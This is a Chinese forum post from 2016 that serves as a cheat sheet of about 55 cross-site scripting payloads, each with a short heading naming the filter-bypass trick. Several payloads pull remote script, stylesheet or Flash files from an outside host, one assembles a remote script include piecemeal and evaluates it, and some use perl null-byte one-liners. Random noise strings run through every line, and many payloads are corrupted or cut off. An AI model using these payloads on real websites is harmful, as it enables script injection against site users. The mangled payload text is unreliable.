(1)普通的XSS JavaScript注入# X. r) L$ ]3 F1 Q9 C8 l5 m" R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) U. Q. P# a( T" I2 b
(99)另类弹框7 _/ |: `- v4 e" f. O1 l% F5 |9 f
<q/oncut=alert()>1
8 F1 B# ?7 w5 ?! m9 p% h& T1 n<s/onclick=alert()>b* }' d0 h) x( k; ^
<XSS=" onclick="alert(1)//">clickme</SSX=">
$ X3 j" u. s) Z/ @9 h$ \ <zzz onclick=alert`1`>clickme</zzz> * k6 Z" A% k7 E5 P2 s0 i+ C7 A9 ]
<a onclick=alert`1`>clickme</a>
* o) J5 f! l& z: c# V! s<a=">clickme</a=">8 |# h' u5 ^" O
<a=">clickme</a>
0 ?9 s- A! g# _% A$ R+ `<z=">clickme</z=">5 t$ j8 h: {, Y6 ?: C8 N2 q
<z onclick=alert`1`>clickme</z>. X. G) G% q& s4 |% K
7 `7 C& l, z" c( g" Y(2)IMG标签XSS使用JavaScript命令! r6 v# ~; G0 N# z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' B# b2 p& }$ o* S! d2 Y' Y3 Q% ~9 v$ z/ _+ {- l& ?0 M) q
(3)IMG标签无分号无引号: U8 H6 J: c8 \) N# U* F
<IMG SRC=javascript:alert(‘XSS’)>/ k. G$ M1 S+ {& e
# e0 E4 H' ^0 u$ j: J( h(4)IMG标签大小写不敏感
( A) M3 k/ H% a5 Y9 d<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# T& w& ^" k7 D) q7 \) p9 I# s
; j0 Y) g! l% l9 n% S+ s: K(5)HTML编码(必须有分号)
, J m: X/ ^# O, Q<IMG SRC=javascript:alert(“XSS”)>' H1 q5 f: M6 u* Q
5 K, ] Y. M; z, i* R2 h7 d
(6)修正缺陷IMG标签
" i7 J d. c' y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- @! E0 T, f6 J. ]. V) ?/ a; f* N8 }7 f% C' F8 g7 V! C
(7)formCharCode标签(计算器)
; O8 I9 S n: Q9 b<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>! L- s3 f- G$ y9 h9 u
. s9 B% m5 Q4 [7 m
(8)UTF-8的Unicode编码(计算器)% |! m' f& X' ?: @8 h, D8 m
<IMG SRC=jav..省略..S')>0 l- z3 B# o5 z" p: i: n" {
- ?, B/ S- j( \ _- _) x4 Z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ \0 x% P5 j6 `& e. ?; N<IMG SRC=jav..省略..S')>
/ m: `& I' E$ J
8 F2 E, i% e1 R$ O, J9 R! ?(10)十六进制编码也是没有分号(计算器)
2 Q9 m5 b$ x" b( \: a k! I9 b* v<IMG SRC=\'#\'" /span>
}7 }3 O/ ]+ N3 c9 h i
, X: x3 B! g) J) S(11)嵌入式标签,将Javascript分开& a$ `5 \5 i6 ^" g
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& B M8 ?4 F& Q2 E( Q6 {( V: a9 r2 x
(12)嵌入式编码标签,将Javascript分开
- t2 b+ ]/ r$ ]3 o8 H) \, O& A3 y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>" e0 A2 a C9 Q4 `# k
" Z( a! u+ N$ P$ r7 t2 M3 B
(13)嵌入式换行符
$ [8 x6 L) j7 Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ x$ C. O4 I A' L4 f: S; Q
" U) r7 d6 }' R3 N0 j% f(14)嵌入式回车
! W* g$ j0 s# x, Q0 H5 f5 a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& F* _# _% k$ p9 u% b% p ?5 E( C
" n' T6 K6 y ^ `: L5 q' U(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 f0 V; o9 r# G+ r<IMG SRC=\'#\'" /span>
- S/ P( s: q& b* j; _
9 ^" t# `6 n8 O- w) k% P(16)解决限制字符(要求同页面)
# t2 w& \( f4 y! s$ G; ^7 x) Y% K; x<script>z=’document.’</script>
1 u& h+ k/ j) E8 N<script>z=z+’write(“‘</script>$ X6 B& M8 j; L; F! h* }; B/ S! p; d
<script>z=z+’<script’</script>9 ~+ W; W8 h. W6 a3 E
<script>z=z+’ src=ht’</script>3 q& s+ x! J* D, y% a4 R
<script>z=z+’tp://ww’</script>
; q7 r- ?8 g3 K- s# B6 ^$ }' h2 d<script>z=z+’w.shell’</script>
2 z3 d7 _/ O8 {/ e% h<script>z=z+’.net/1.’</script>; C* ]: R3 Z# h' G
<script>z=z+’js></sc’</script>6 i* l( U& l3 m! k. \
<script>z=z+’ript>”)’</script>
8 X7 k" y7 v ?- k% R<script>eval_r(z)</script>
4 X+ o8 n- d$ e+ E/ W- Z
! h! U# o6 c2 L$ ]5 D(17)空字符
3 ?: L5 X4 Z6 P2 w$ `3 f8 T) Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; z/ w, d# n: u7 a w$ S9 |* `
6 v3 a& `1 o7 Q(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 t, w& E; n) a5 m. R# n1 y- A
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out; @, S2 i# [" e# _$ n- R- r
+ O; R( m% w7 ?) c. t" _+ O
(19)Spaces和meta前的IMG标签: ?# M# _+ {* T. b" _
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>, X- ]" f0 t/ L# Z6 a( A
+ W% D* d- \0 A& ], l
(20)Non-alpha-non-digit XSS
7 x- V8 A" y Y<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
4 }( f# r1 P0 O1 v. H# M
- s: k c" [% S9 j(21)Non-alpha-non-digit XSS to 2
3 }" l& p7 v. J+ J6 e+ n' Q8 o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 U, f3 }' Y/ |0 i8 `
% |/ U5 y/ \ L9 S
(22)Non-alpha-non-digit XSS to 3% b" f% I) k! j$ R/ ]) n' x
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
) s2 }0 f/ X; y' Q# l) A q- [) S: X& o8 k3 _
(23)双开括号" s( V: D/ l) h! G2 u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
( `3 ~' G# d; ^0 \' A' m
' @, V+ @; I5 J! m(24)无结束脚本标记(仅火狐等浏览器)
4 ?: f% y: c7 T% Q1 F4 S<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
* }4 g' L4 D+ y0 a4 V% Z. ]
G# n# m3 Y. A: K7 v(25)无结束脚本标记2
0 T) G9 d* r2 C<SCRIPT SRC=//3w.org/XSS/xss.js>8 p" f: i& X5 h& k
& Y- i8 p* K3 g% I' X5 k& q+ h, t, d* E
(26)半开的HTML/JavaScript XSS4 a) d9 ]% u9 f" V% T: s5 m, E
<IMG SRC=\'#\'" /span>
+ F: O, k7 m' j+ o/ g. L: e# v8 T ?1 c7 z% P( k
(27)双开角括号6 H0 q, \- _, E
<iframe src=http://3w.org/XSS.html <
. p" u# A! E* g4 W6 j& `) G: e( _; @3 C
(28)无单引号 双引号 分号
q& s$ _/ K5 N1 ]<SCRIPT>a=/XSS/+ |' U. U& M) g& r
alert(a.source)</SCRIPT>
+ I. d5 m. ^( S5 i9 O: U9 j# `5 U( J5 r
(29)换码过滤的JavaScript
0 _& y K8 U2 y* q- k/ B\”;alert(‘XSS’);//5 C+ P& n( ~1 {
& s; t8 Z7 Y- v
(30)结束Title标签. ~2 K2 d- J9 f0 |
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
[$ L! r1 s- U
; K$ S- a5 {% b(31)Input Image
8 W% P( P- q; d* j/ j/ o3 t& B- Q9 A<INPUT SRC=\'#\'" /span>/ R4 c$ k+ S1 K7 {6 P& ?: c$ Z
2 H3 w1 F% N8 { Z. \
(32)BODY Image
; z7 y9 r/ n e( o5 ?<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 e4 Y0 X) W, k) a6 E
3 Y- d1 G$ a& z# } U(33)BODY标签
+ G3 P6 k4 Q( a) j<BODY(‘XSS’)>; i- R3 {/ s9 d0 R! _7 A2 F
* ]& o- k; O1 x- {8 b. F
(34)IMG Dynsrc
# v3 z0 m' [0 F: Q0 F" a<IMG DYNSRC=\'#\'" /span>
" c3 l( x+ _( w) I0 R2 X. F9 K
, Z2 w5 n5 n5 ?% r+ y(35)IMG Lowsrc' g! y& S& r6 d3 n1 d! x: X$ o2 s5 D
<IMG LOWSRC=\'#\'" /span>) O G9 |: N1 R0 h/ e
; W! j; U: U5 y2 w0 F% \( c(36)BGSOUND4 n, U# N4 D) c+ C
<BGSOUND SRC=\'#\'" /span>
, G4 s+ n$ ?: t) Q/ G" R0 Y& Y! s2 T8 U+ j3 I- P) a# _/ r
(37)STYLE sheet
; e) c, B) o( W' g- g<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' Y7 @1 K1 I, H n+ |4 S* C8 h# P I. [; S; n7 t
(38)远程样式表
1 A% G- |" B8 \, C6 z# S8 C<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% ]4 R& S) I. T9 C5 U( M+ A s
(39)List-style-image(列表式)
9 [8 z) |! C) c; e) `<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" F& k5 v9 T! G: f0 }& U2 D4 }
(40)IMG VBscript
0 j; c5 }* r- x<IMG SRC=\'#\'" /STYLE><UL><LI>XSS2 [( ~$ I" t8 g# `4 _, a) M5 I+ R
. v$ A4 o: g' `& T8 g; n: F: `
(41)META链接url, |7 A1 I! G, b' n! Q. z6 ~) J+ g1 ^
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' o. v9 I1 Q# x# a/ S( h$ P2 M
1 b! j5 T5 n/ d$ I7 A2 Z
(42)Iframe
! g, k# o. W( M. d4 J<IFRAME SRC=\'#\'" /IFRAME>
+ n1 v% s1 L$ T- o
* a8 w @8 a" q9 {(43)Frame; L( \% b# R+ e6 h' N5 Q/ |
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
8 X6 e* e4 j1 j/ T( H( {: }
# i+ Q% G! Y: N: n `- N% _(44)Table
6 c$ x5 k6 |. {7 }7 M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) @7 ~ B4 u, e* r# A
9 e5 ?1 F, a; f5 c2 g' J7 ?+ L(45)TD! |! o! E1 i. x' a% P2 U7 w3 y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 E) F) c `* h) o% N' g
$ T; D/ p7 p9 P: l' F- I b
(46)DIV background-image
) _* a9 ?$ i: f5 K& z0 ?<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) C* G/ S; r, c
0 F* C; r% z, h% g9 Z$ w(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 O* v3 @ i% n: [8 m6 T1 \
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
% f8 s! b) @" i8 x
: R! x+ X- W2 M5 V3 t! r) K0 R(48)DIV expression! j% A9 o" l, ~1 W, U, b4 \
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 g, G! q' |+ ]& M3 d% w
4 p! Y* R4 j, I4 o4 A/ ^2 y/ I
(49)STYLE属性分拆表达
1 J/ q4 A; u% u- b% H3 H6 c2 g4 Z<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 E' j0 C, u2 n- `' Y2 e6 Q" D6 ^
( W; ]4 F! F A) B8 K, P* q(50)匿名STYLE(组成:开角号和一个字母开头)
$ ]9 s5 ?, A) v( C4 ~" F<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* \4 ~5 f: N/ G9 x4 A" i$ E9 S1 r6 e" {8 j& H
(51)STYLE background-image3 y: _/ O# q. T/ a
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* \" t0 B: n, _+ k5 ]# I9 t
. Q( J+ J/ B2 u(52)IMG STYLE方式1 f) l r0 N0 N6 b' Y5 `
exppression(alert(“XSS”))’>
6 i- M' o8 l& n5 q
) @8 u4 b! s" W) e; Z8 j% {, p; g(53)STYLE background
- a) s! s6 u0 w( l% ^0 q# F% o. J<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 R0 n$ U$ s) A* H/ p. V; g) ?- m9 O8 ?8 g- @& ]
(54)BASE
8 F" O$ L- J5 }; o<BASE HREF=”javascript:alert(‘XSS’);//”>
4 ^, M% s* @( x* D7 Z& A; B! J' X" m' h
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- E" D J9 T* P9 e+ A0 B. U
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
& p5 a- d6 J4 d `" ]0 u8 J |
发表于 2016-4-28 10:06:15
收藏
支持
反对